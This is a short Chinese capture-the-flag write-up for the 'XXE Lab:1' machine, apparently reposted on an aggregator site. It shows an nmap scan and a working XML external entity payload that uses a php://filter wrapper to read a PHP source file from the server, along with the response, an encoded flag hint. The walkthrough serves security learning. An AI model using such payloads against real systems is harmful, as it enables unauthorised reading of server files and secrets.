XXE Lab:1题解

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XXE Lab:1题解相关的知识,希望对你有一定的参考价值。

思路

题目已经提示是XXE的专项练习,所以,直接找XXE问题.

难度

入门

端口扫描

nmap -sS -A 10.129.10.64

发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件
技术分享图片

80端口检查

其中,/xxe/index.php页面通过xml格式提交用户名和密码,于是,此处即为XXE所在位置。
构造如下payload,读取页面源码,获得一不知是flag还是flag Hint的内容:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY admin SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root><name>&admin;</name><password>123</password></root>

响应:

<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->

于是,陷入蒙蔽。。。。等待作者反馈中

以上是关于XXE Lab:1题解的主要内容,如果未能解决你的问题,请参考以下文章

安全-XXE漏洞复现(xxe-lab)

边打XXE-lab边学习

XML引用外部实体触发XXE漏洞

[NTUSTISC pwn LAB 7]Return to libc实验(puts泄露libc中gadget片段定位)

XXE漏洞简介以及Payload收集

从零开始的xxe学习